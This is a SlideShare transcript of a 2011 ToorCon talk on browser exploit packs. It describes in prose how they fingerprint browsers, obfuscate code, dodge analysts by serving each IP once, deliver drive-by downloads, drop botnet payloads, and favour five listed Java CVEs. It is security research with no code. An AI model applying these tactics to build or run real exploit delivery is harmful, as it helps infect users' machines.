SlideShare una empresa de Scribd logo

Toorcon Seattle 2011 - Browser Exploit Packs

Aditya K Sood
Aditya K Sood
Tecnología
1 de 20
Browser Exploit Packs Exploitation Tactics ToorCon Security Conference SEATTLE , 2011 Aditya K Sood | Richard J Enbody SecNiche Security | Department of Computer Science and Engineering Michigan State University
About Us  Aditya K Sood ─ Founder , SecNiche Security ● Independent Security Consultant, Researcher and Practitioner ● Worked previously for Armorize, Coseinc and KPMG ● Active Speaker at Security conferences ● Written Content – ISSA/ISACA/CrossTalk/HITB/Hakin9/Elsevier NES|CFS ● LinkedIn : http://www.linkedin.com/in/adityaks ● Website: http://www.secniche.org | Blog: http://secniche.blogspot.com ─ PhD Candidate at Michigan State University  Dr. Richard J Enbody ─ Associate Professor, CSE, Michigan State University ● Since 1987, teaching computer architecture/ computer security / mathematics ● Website: http://www.cse.msu.edu/~enbody ─ Co-Author CS1 Python book, The Practice of Computing using Python. ─ Patents Pending – Hardware Buffer Overflow Protection 2
Agenda  BEP Generic Framework ─ BEP Insidious Details  BEP Trades and Tactics ● Plugin Detection and Verification ● String Obfuscation, Replacement and Manipulation ● User Agent Based Fingerprinting ● IP Logging Detection Trick ● Drive By Downloads ● Drive By Cache ● BEP’s and Botnets Collaboration  Future Work and Discussion 3
BEP Generic Framework  BEP Framework ─ Detecting Patterns ● Fingerprinting the victim environment ● Applying inherent techniques supporting exploitation ● Robust approach to set the ground before serving exploits ─ Supporting Objects ● JavaScript event handlers ● Document Object Model (DOM) objects ● Dynamic content generation ● Requests across domains ─ Exploit Trigger ● Serving exploits efficiently ● Dropping malicious executable or bot in the victim machine 4
BEP Configuration Check  BEP Framework ─ Configuration (Admin Panel + Execution Environment) ● Payload determines the malicious executable to be dropped – BEP’s are a supporting agent for botnets. Ofcourse, bots are dropped. ● Apart from normal settings, exploit distribution environment is set. 5
PHP Ion Cube Encoder  PHP Ion Cube Encoder ─ Why ? ● Most of the BEPs are designed in PHP. ● Encodes all the exploits in a robust manner (efficient code protection) – All PHP files in BEP’s are encoded except configuration file – No restoration of compiled files back to source level. » Protection is applied at compilation time – Encoded files have digital signatures. – MAC protection enabled. Encoding Layer {n} ● Exploit detection becomes hard Encoding Layer { … } Encoding Layer {2} Encoding Layer {1} Optimized compiled Byte codes 6
Max Mind Geo Location Library  Tracking and Tracing ─ Open source library for statistical analysis ● Most of BEP’s and botnets explicit use this library ● However, it is not a hard restriction to use this library – Malware writers can also use custom designed tracking code – An inadvertent part of any BEP 7
Trade and Tactics 8
Plugin Detection and Verification  Plugin Verification and Version Detection ─ Plugin Detection ! Why? ● Enumerating the installed plugins in browsers. ● Serving exploits based on installed version of various plugins – Generic PluginDetect.js script is used to attain the information ─ Example: Phoenix Browser Exploit Pack ● GetJavaInfo.jar – Decompilation provides the generic code of detecting installed java version – Used to verify the appropriate exploit match 9
String Encoding and Replacement  Encoding Tactics ─ String manipulation ● Defining variables to obfuscate the reality » Declaring the strings in reverse order during execution » Passing the required string to definitive string replacement class » Randomizing the BEP file names 10
String Tampering - Example 11
User Agent Based Fingerprinting 12
IP Logging Detection Trick (IPLDT)  What it is all about? ─ Hampering the analysis process – Exploit is served only once a time to the required IP – BEP uses GeoLocation PHP library to keep a track of IP addresses – Appropriate check is performed before serving exploit » If IP is already served no more exploits are delivered » In other terms, no more infection to the specific IP address 13
Long Live – Drive By Downloads  Inside Drive By Downloads – Serving malware by forcing users to visit infected website – Iframe is injected into vulnerable websites – Exploit is served silently based on browser environment 14
Long Live – Drive By Downloads  Complete Process – Victim browser is forced to visit infected website – Iframe redirects browser to the EXPLOIT POINT (Exploit Hub) – Exploit is served by fingerprinting browser environment – Browser is exploited successfully – Exploit point silently asks for the malware from the malicious domain » It can be self driven – Malware is downloaded into system and automatically installed 15
Wait ! Drive By Cache. What?  What it is ? – Brother of Drive by Download Attacks. Is it ? – More efficient way to bypass anti virus protections .  Comparison – Drive By Download / Drive By Cache – Very less variations have been noticed ( Drive By Cache) – However, the infections are still in the wild and some of the traces have been noticed – Lot more to research over this attack but it has been initialized already – Reference: http://blog.armorize.com/2011/04/newest-adobe-flash-0-day-used-in- new.html 16
BEP’s & Botnets Collaboration  Is This True Artifact? ─ Yes it is. – BEP’s are used in conjunction with botnets – On successful exploitation, bot is dropped into victim machine – Harnessing the power of two different frameworks to deliver malware – Some traces have been seen of ZEUS (Botnet) + BlackHole (BEP) 17
Top 5 Java Exploits – BEP Choice  Finest and Fast Five Java Exploits ─ High exploitation and infection Rate – Sun Java Runtime Environment Trusted Methods Chaining Remote Code Execution Vulnerability (CVE-2010-0840) – Java JRE MixerSequencer Invalid Array Index Remote Code Execution Vulnerability (CVE-2010-0842) | Java JMF MIDI – Java Unspecified vulnerability in the Java Deployment Toolkit component in Oracle Java SE (CVE-2010-0886) – Sun Java Runtime RMIConnectionImpl Privileged Context Remote Code Execution Vulnerability (CVE-2010-0094) | Java RMI – Java argument injection vulnerability in the URI handler in Java NPAPI plugin (CVE-2010-1423) 18
Future Work and Discussion  Hunting back the malware domains like a hacker  Continuous analysis to dig deeper into malware world  Designing solutions and protection mechanisms  Researching new and advanced hacking techniques  Becoming smarter with the passage of time 19
Questions / Thanks  Thanks to ToorCon (http://www.toorcon.org)  Thanks to SecNiche Security(http://www.secniche.org )  Malware at Stake ( http://secniche.blogspot.com ) 20

Recomendados

Dalvik Vm & Jit
Dalvik Vm & JitDalvik Vm & Jit
Dalvik Vm & JitAnkit Somani
 
TOMOYO Linux on Android
TOMOYO Linux on AndroidTOMOYO Linux on Android
TOMOYO Linux on AndroidToshiharu Harada, Ph.D
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidE Hacking
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesQi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesNational Cheng Kung University
 
Understanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineUnderstanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineNational Cheng Kung University
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Vincenzo Iozzo
 

Recomendados

Dalvik Vm & Jit
Dalvik Vm & JitDalvik Vm & Jit
Dalvik Vm & JitAnkit Somani
 
TOMOYO Linux on Android
TOMOYO Linux on AndroidTOMOYO Linux on Android
TOMOYO Linux on AndroidToshiharu Harada, Ph.D
 
Fuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidFuzzing the Media Framework in Android
Fuzzing the Media Framework in AndroidE Hacking
 
Android Internals
Android InternalsAndroid Internals
Android InternalsOpersys inc.
 
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesQi -- Lightweight Boot Loader Applied in Mobile and Embedded Devices
Qi -- Lightweight Boot Loader Applied in Mobile and Embedded DevicesNational Cheng Kung University
 
Understanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineUnderstanding the Dalvik Virtual Machine
Understanding the Dalvik Virtual MachineNational Cheng Kung University
 
Possibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented ProgrammingPossibility of arbitrary code execution by Step-Oriented Programming
Possibility of arbitrary code execution by Step-Oriented Programmingkozossakai
 
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009
Fun and Games with Mac OS X and iPhone Payloads, Black Hat Europe 2009Vincenzo Iozzo
 
Build Programming Language Runtime with LLVM
Build Programming Language Runtime with LLVMBuild Programming Language Runtime with LLVM
Build Programming Language Runtime with LLVMNational Cheng Kung University
 
Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'Tetsuyuki Kobayashi
 
Introduction to Android by Demian Neidetcher
Introduction to Android by Demian NeidetcherIntroduction to Android by Demian Neidetcher
Introduction to Android by Demian NeidetcherMatthew McCullough
 
Overview of Android binder IPC implementation
Overview of Android binder IPC implementationOverview of Android binder IPC implementation
Overview of Android binder IPC implementationChethan Pchethan
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jarsPacSecJP
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAlex Matrosov
 
Jnode
JnodeJnode
JnodeRaul Espinola
 
Accelerated Android Development with Linaro
Accelerated Android Development with LinaroAccelerated Android Development with Linaro
Accelerated Android Development with LinaroNational Cheng Kung University
 
F9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded SystemsF9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded SystemsNational Cheng Kung University
 
Guides To Analyzing WebKit Performance
Guides To Analyzing WebKit PerformanceGuides To Analyzing WebKit Performance
Guides To Analyzing WebKit PerformanceNational Cheng Kung University
 
Os Madsen Block
Os Madsen BlockOs Madsen Block
Os Madsen Blockoscon2007
 
Explore Android Internals
Explore Android InternalsExplore Android Internals
Explore Android InternalsNational Cheng Kung University
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Android Optimization: Myth and Reality
Android Optimization: Myth and RealityAndroid Optimization: Myth and Reality
Android Optimization: Myth and RealityNational Cheng Kung University
 
Android IPC Mechanism
Android IPC MechanismAndroid IPC Mechanism
Android IPC MechanismNational Cheng Kung University
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devicessrkedmi
 
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Toshiharu Harada, Ph.D
 
Learn C Programming Language by Using GDB
Learn C Programming Language by Using GDBLearn C Programming Language by Using GDB
Learn C Programming Language by Using GDBNational Cheng Kung University
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 

Más contenido relacionado

La actualidad más candente

Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'Tetsuyuki Kobayashi
 
Introduction to Android by Demian Neidetcher
Introduction to Android by Demian NeidetcherIntroduction to Android by Demian Neidetcher
Introduction to Android by Demian NeidetcherMatthew McCullough
 
Overview of Android binder IPC implementation
Overview of Android binder IPC implementationOverview of Android binder IPC implementation
Overview of Android binder IPC implementationChethan Pchethan
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jarsPacSecJP
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAlex Matrosov
 
F9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded SystemsF9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded SystemsNational Cheng Kung University
 
Os Madsen Block
Os Madsen BlockOs Madsen Block
Os Madsen Blockoscon2007
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_enSunghun Kim
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemTamas K Lengyel
 
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devicessrkedmi
 
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Toshiharu Harada, Ph.D
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCanSecWest
 

La actualidad más candente (20)

Build Programming Language Runtime with LLVM
Build Programming Language Runtime with LLVMBuild Programming Language Runtime with LLVM
Build Programming Language Runtime with LLVM
 
Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'Android is NOT just 'Java on Linux'
Android is NOT just 'Java on Linux'
 
Introduction to Android by Demian Neidetcher
Introduction to Android by Demian NeidetcherIntroduction to Android by Demian Neidetcher
Introduction to Android by Demian Neidetcher
 
Overview of Android binder IPC implementation
Overview of Android binder IPC implementationOverview of Android binder IPC implementation
Overview of Android binder IPC implementation
 
Kasza smashing the_jars
Kasza smashing the_jarsKasza smashing the_jars
Kasza smashing the_jars
 
Advanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/GapzAdvanced Evasion Techniques by Win32/Gapz
Advanced Evasion Techniques by Win32/Gapz
 
Jnode
JnodeJnode
Jnode
 
Accelerated Android Development with Linaro
Accelerated Android Development with LinaroAccelerated Android Development with Linaro
Accelerated Android Development with Linaro
 
F9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded SystemsF9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
F9: A Secure and Efficient Microkernel Built for Deeply Embedded Systems
 
Guides To Analyzing WebKit Performance
Guides To Analyzing WebKit PerformanceGuides To Analyzing WebKit Performance
Guides To Analyzing WebKit Performance
 
Os Madsen Block
Os Madsen BlockOs Madsen Block
Os Madsen Block
 
Explore Android Internals
Explore Android InternalsExplore Android Internals
Explore Android Internals
 
Flash security past_present_future_final_en
Flash security past_present_future_final_enFlash security past_present_future_final_en
Flash security past_present_future_final_en
 
Android Optimization: Myth and Reality
Android Optimization: Myth and RealityAndroid Optimization: Myth and Reality
Android Optimization: Myth and Reality
 
Android IPC Mechanism
Android IPC MechanismAndroid IPC Mechanism
Android IPC Mechanism
 
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis SystemScalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
Scalability, Fidelity and Stealth in the DRAKVUF Dynamic Malware Analysis System
 
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
[Blackhat EU'14] Attacking the Linux PRNG on Android and Embedded Devices
 
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
Learning, Analyzing and Protecting Android with TOMOYO Linux (JLS2009)
 
Learn C Programming Language by Using GDB
Learn C Programming Language by Using GDBLearn C Programming Language by Using GDB
Learn C Programming Language by Using GDB
 
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updatedCsw2017 bazhaniuk exploring_yoursystemdeeper_updated
Csw2017 bazhaniuk exploring_yoursystemdeeper_updated
 

Similar a Toorcon Seattle 2011 - Browser Exploit Packs

Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Aditya K Sood
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedAditya K Sood
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?Aditya K Sood
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Aditya K Sood
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxRahul Mohandas
 
Freeze Drying for Capturing Environment-Sensitive Malware Alive
Freeze Drying for Capturing Environment-Sensitive Malware AliveFreeze Drying for Capturing Environment-Sensitive Malware Alive
Freeze Drying for Capturing Environment-Sensitive Malware AliveFFRI, Inc.
 
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...MindShare_kk
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisTamas K Lengyel
 
Readactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory DisclosureReadactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory Disclosurech0psticks
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...Aditya K Sood
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Maksim Shudrak
 
Smartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwareSmartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwarePositive Hack Days
 
Malware analysis
Malware analysisMalware analysis
Malware analysisxabean
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockownerkhan
 
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...The Linux Foundation
 
Capture-HPC talk@ OSDC.tw 2009
Capture-HPC talk@ OSDC.tw 2009Capture-HPC talk@ OSDC.tw 2009
Capture-HPC talk@ OSDC.tw 2009Da-Chang Guan
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Stephan Chenette
 

Similar a Toorcon Seattle 2011 - Browser Exploit Packs (20)

Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
Virus Bulletin 2011 Conference - Browser Exploit Packs - Death by Bundled Exp...
 
DEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and OperatedDEF CON 20 - Botnets Die Hard - Owned and Operated
DEF CON 20 - Botnets Die Hard - Owned and Operated
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
 
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
Hackers on Planet Earth (HOPE - 2012) Advancements in Botnet Attacks
 
Detecting Evasive Malware in Sandbox
Detecting Evasive Malware in SandboxDetecting Evasive Malware in Sandbox
Detecting Evasive Malware in Sandbox
 
Freeze Drying for Capturing Environment-Sensitive Malware Alive
Freeze Drying for Capturing Environment-Sensitive Malware AliveFreeze Drying for Capturing Environment-Sensitive Malware Alive
Freeze Drying for Capturing Environment-Sensitive Malware Alive
 
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
BlackHat EU 2012 - Zhenhua Liu - Breeding Sandworms: How To Fuzz Your Way Out...
 
Pitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysisPitfalls and limits of dynamic malware analysis
Pitfalls and limits of dynamic malware analysis
 
Readactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory DisclosureReadactor-Practical Code Randomization Resilient to Memory Disclosure
Readactor-Practical Code Randomization Resilient to Memory Disclosure
 
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in...
 
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
Fuzzing malware for fun & profit. Applying Coverage-Guided Fuzzing to Find Bu...
 
Smartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking MalwaremalwareSmartcard Vulnerabilities In Modern Banking Malwaremalware
Smartcard Vulnerabilities In Modern Banking Malwaremalware
 
Malware analysis
Malware analysisMalware analysis
Malware analysis
 
Fireshark - Brucon 2010
Fireshark - Brucon 2010Fireshark - Brucon 2010
Fireshark - Brucon 2010
 
Deep Dive into WinRT
Deep Dive into WinRTDeep Dive into WinRT
Deep Dive into WinRT
 
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...
 
Xfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknockXfocus xcon 2008_aks_oknock
Xfocus xcon 2008_aks_oknock
 
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...
XPDS14 - Zero-Footprint Guest Memory Introspection from Xen - Mihai Dontu, Bi...
 
Capture-HPC talk@ OSDC.tw 2009
Capture-HPC talk@ OSDC.tw 2009Capture-HPC talk@ OSDC.tw 2009
Capture-HPC talk@ OSDC.tw 2009
 
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
Detecting Web Browser Heap Corruption Attacks - Stephan Chenette, Moti Joseph...
 

Más de Aditya K Sood

Emerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareEmerging Trends in Online Social Networks Malware
Emerging Trends in Online Social Networks MalwareAditya K Sood
 
Enfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesEnfilade: Tool to Detect Infections in MongoDB Instances
Enfilade: Tool to Detect Infections in MongoDB InstancesAditya K Sood
 
Detecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchDetecting Ransomware/Bot Infections in Elasticsearch
Detecting Ransomware/Bot Infections in ElasticsearchAditya K Sood
 
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
 
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
 
Network Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodNetwork Security : Book Review : Targeted Cyber Attacks : Aditya K Sood
Network Security : Book Review : Targeted Cyber Attacks : Aditya K SoodAditya K Sood
 
Abusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAbusing Glype Proxies - Attacks, Exploits and Defences
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
 
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineNIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin Magazine
NIframer - CPanel IFrame Injector (Bash based) - Virus Bulletin MagazineAditya K Sood
 
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...
